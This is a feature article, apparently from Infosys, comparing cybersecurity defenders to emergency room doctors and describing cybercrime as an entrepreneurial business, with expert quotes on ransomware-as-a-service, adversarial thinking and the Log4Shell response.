The rise of the new-age Cyber-Heroes
You need to think differently. You need to be on your toes. Experts tell us the hows and whys of today’s cyber security world, and how the emerging hacker ecosystem calls for a new type of defender.
The technical cybersecurity story is about endless breaches and endless patches, about malware, insider threats, user errors and application vulnerabilities.
The human story is about two different emerging mindsets. While attackers and defenders can have amazingly similar technical skillsets, their working methods have evolved over time in very different directions.
Ten years ago, a cybersecurity professional was an expert in a tiny cubicle tucked away in a remote corner in the office. Today, she has to engage in mainstream operations and defend critical enterprise assets against fast-moving threats. She has had to develop the mindset of an emergency room (ER) doctor – always on red alert to spot the damage, understand its causes and stabilize the situation.
The cybercriminals have begun to operate like entrepreneurs and operate illegal supply chains, where different specialists write malware, hack into target firms, steal data, install ransomware and cash out via extortion. Sometimes they even have customer service experts to help their victims buy the bitcoins to pay the ransom!
Today, these different approaches to attack and defence are intrinsically embedded in the cybersecurity ecosystem. Of these two, the real cyber-hero is not the hacker but the first responder. While the hacker can specialize in one type of attack, the defender has to be able to cope with them all – just as an emergency room doctor has to be able to deal with all kinds of accidents, injuries and illnesses. Like the doctor, the defender must be knowledgeable, experienced, and alert. And unlike the doctor, the defender also needs an adversarial mindset. Many of the best cybersecurity experts are the people who like the cut and thrust, who are good at adversarial thinking and who enjoy being in the fight against the bad guys.
What does a cybersecurity expert have in common with an ER doctor
Some might think that likening a cybersecurity practitioner to an ER doctor might be stretching it a bit, but the wide use of terms such as “digital forensics,” “on-board diagnostics,” and “golden hour” suggest that the analogy may be worth thinking about.
While ER doctors patch up patients wheeled in from accidents or with a sudden illness, a cyber defender may be trying to patch up a vulnerability that has suddenly appeared, and may compromise the privacy and safety of medical records, or enable frauds against people’s bank accounts, or affect an autonomous vehicle endangering lives of the driver, passengers and pedestrians.
“You mustn't simply indulge in wishful thinking and the hope that your protection measures will be good.” - Ross Anderson Tweet
Cyber defenders, like medics, need to be ready for emergency response. They have to be on high alert, they must remain calm, they may have to act fast, but they may have to draw on a lot of specialised and complex knowledge to decide what to do.
Says Ross Anderson, researcher, author, and professor of security engineering at the University of Cambridge, UK, “If something goes wrong, then you either walk into your general practitioner (GP) or else you go to an emergency room. And in the ER, they will stabilize you or they will stop the bleeding, they'll splint any broken bones, they'll sort out your heart rhythm, and your breathing.”
Similarly, he says, should a company be hit by an exploit or an attack, then there's a first response to it, which is stopping further harm.
“It's finding out where the attack is coming from and blocking it.”
Vishal Salvi, CISO and Head of Cyber Practice at Infosys, agrees and holds a great responsibility to both.
“Think of those doctors who are receiving patients, every single day – people with distress, requiring immediate attention. In a similar way, our team is constantly looking at these critical vulnerabilities coming their way. And they often have to act quickly,” says Salvi.
All this while staying calm and composed at all times, say the experts.
“Imagine somebody in the trauma room panicking when a badly injured case arrives, right? Or, about ten patients with second degree burns are brought in from a fire in a building? It's going to be a disaster if the ER doctors panic.”
It's sudden breaches that give rise to a highly charged atmosphere in cybersecurity units.
“People have to be calm under pressure and not immediately panic… you know, be a kind of general or like, central point in that storm and communicate effectively. ‘Okay, here's what's going on, here's what we need to do. Here's the first list of priorities that we have, here's where that's going to cascade from, and let’s just respond that way’,” says Jen Miller-Osborn, Deputy Director of Threat Intelligence, Unit 42, Palo Alto Networks (PAN), a US-based global cybersecurity company.
Cybercrime is “entrepreneurship” in a silicon den
Cybercriminals are often best thought of as entrepreneurs, because after all, when some new vulnerability or some new attack method comes along, you end up with dozens to hundreds of entrepreneurs – only instead of trying to sell some new service, they’re trying to do some new type of fraud or rip people off.
But cybercrime entrepreneurs differ from real world entrepreneurs in the legitimate economy in a couple of ways, says Anderson.
“They can't get external financing. So, they end up having to finance all their business activities from retained profit and do not have large resources of capital to develop complicated software,” he says, adding the second reason that it’s not possible to cash out a criminal business – “There's no market for that.”
In Jun 2021, in one of his research papers, Anderson and his team had presented a fresh perspective on cybercrime - the viewpoint of entrepreneurship. Here, they proposed a framework that set out what infrastructure enables a particular cybercrime to get started, what barriers to entry there may be, how the crime can be scaled, what factors can inhibit scaling, why defenders can be ineffective and what eventual limits there may be to growth.
PAN’s Miller-Osborn points out that this business model is also evolving and there are quick ways to make money.
“It is 100% moving into a business model,” she says, adding: “Ransomware as a service, is what's really kicked off kind of turning it into a bigger business. It's where the malware framework creators realized that not only can they make money using the ransomware but can also rent it to other people who will then carry out their own attacks.”
The money-making model – A charge like a rental fee or a percentage of the profit.
The problem doesn’t end there. From the defence standpoint, it makes it much harder for defenders because modern ransomware-as-a-service can be used by people who have access to a target system but who lack traditional hacking skills. That means that many more people can potentially be attackers.
“All you need is some money, and the right contacts, you don't need to be technical in any way, you do not need to understand how to do or use any of these ransomware tools, they will train you. They have a very effective customer service model too,” Miller-Osborn added.
Cybercrime entrepreneurs likened to market stall owners
In a way, cybercrime entrepreneurs are better thought of like people who are operating a market stall. We have many of these in Cambridge – in the market square we have people who sell fruit and vegetables or antiques or who repair bikes. They don't scale up the way that tech firms do in the mainstream business economy, where you get venture financing, you build a company, and you then sell the company. But criminals don’t have access to capital markets and often can’t even enforce contracts with each other. So this gives us an interesting characterization of cybercrime as being crowd sourced with very little capital - Ross Anderson
Using the same ransomware as an example, Infosys’ Salvi believes cybercrime has evolved into yet another business model driven by an entrepreneurial thinking. There are ways beyond demands for money for decryption of data.
“If you were to say, ‘I don’t want my data and I'll recover from backup,’ they threaten to publish confidential data leading to reputational damage. If you are okay with that, they threaten to go to your customers and tell them that their data has been compromised. And in the worst scenario, they would do a denial-of-service attack on your system,” adds Salvi.
Sun Tzu and the Art of Cyber War
Sun Tzu, Chinese military strategist who lived in 5th century BC is the reputed author of the Chinese classic ‘The Art of War,’ the earliest known treatise on war and military science where he had said “To know your enemy, you must become your enemy.”
Today, that still holds good, not just for physical battles but cyber conflicts as well and the ability to do adversarial thinking is a critical skill for a cyber security professional.
“You mustn't simply indulge in wishful thinking and the hope that your protection measures will be good. And whenever you come across a system, you should always be asking yourself - How can this be turned against me? You should always be looking at sets of rules and trying to look for the loopholes, trying to look for the edge cases that can be used for an exploit,” says Anderson, adding, “As in chess or judo you’re always trying to figure out how you can use the other side's moves against them.”
“Log4Shell is not the first vulnerability garnering significant public interest, and it almost certainly won’t be the last.” – Jen Miller-Osborn Tweet
One needs an understanding not only of what and how the adversary is thinking, but also just of what your attack surface looks like. “Why are the adversaries doing this activity, whether it's for criminal financial goals, or whether it's for some of the nation state kind of espionage type goals,” pointed out Miller-Osborn.
“When they're evaluating a target, that's how they're evaluating. They're looking either for a big payday because they want money, or there are some data access long term goals that they have,” added Miller-Osborn.
According to Sangamesh Shivaputrappa, Group Manager - Information Security at Infosys, the next level of attack is happening through channels unknown to us. “For instance, no one ever thought a ubiquitous component could be hacked but it could, and it led to a nightmare called Log4Shell. This particular attack though critical was very interesting because it wasn’t even a separate piece of software that was tampered with. It was a component that was used in different packages,” he says.
Experts noted that some of the companies didn't even realize if they were vulnerable, or whether, or not, any of their products were going to be hit.
“That was the level of chaos and confusion when the Log4Shell attack happened last December,” says Shivaputrappa.
Echoing his thoughts, Miller-Osborn during her Senate hearing is also reported to have said that it was important to first take a step back and understand why Log4Shell matters. “If it feels like Log4Shell is just the latest in a string of vulnerabilities that the cybersecurity community must rally in response to, you are right. Log4Shell is not the first vulnerability garnering significant public interest, and it almost certainly won’t be the last. That’s why it’s important to look at Log4Shell both as a standalone vulnerability that demands discrete analysis and reflection, and as the latest in a string of national-level vulnerabilities that impact federal systems, critical infrastructure, and state and local networks alike,” she said at the hearing.
War Room scene during the Battle of Log4Shell
- Set up war room for discussion.
- Rope in security analyst and content management team.
- Bring in the vulnerability management team to understand this particular vulnerability.
- Use vulnerability scanning tools to scan the systems and understand whether any of their systems are vulnerable for this attack.
- Messages are passed back to Blue team of the Security Operations Unit to create a watch list for a focused monitoring of those critical assets till a vulnerability patch is released.
- Log4Shell was quite challenging because every other second day or third day there were new vulnerabilities cropping up and new patches being released.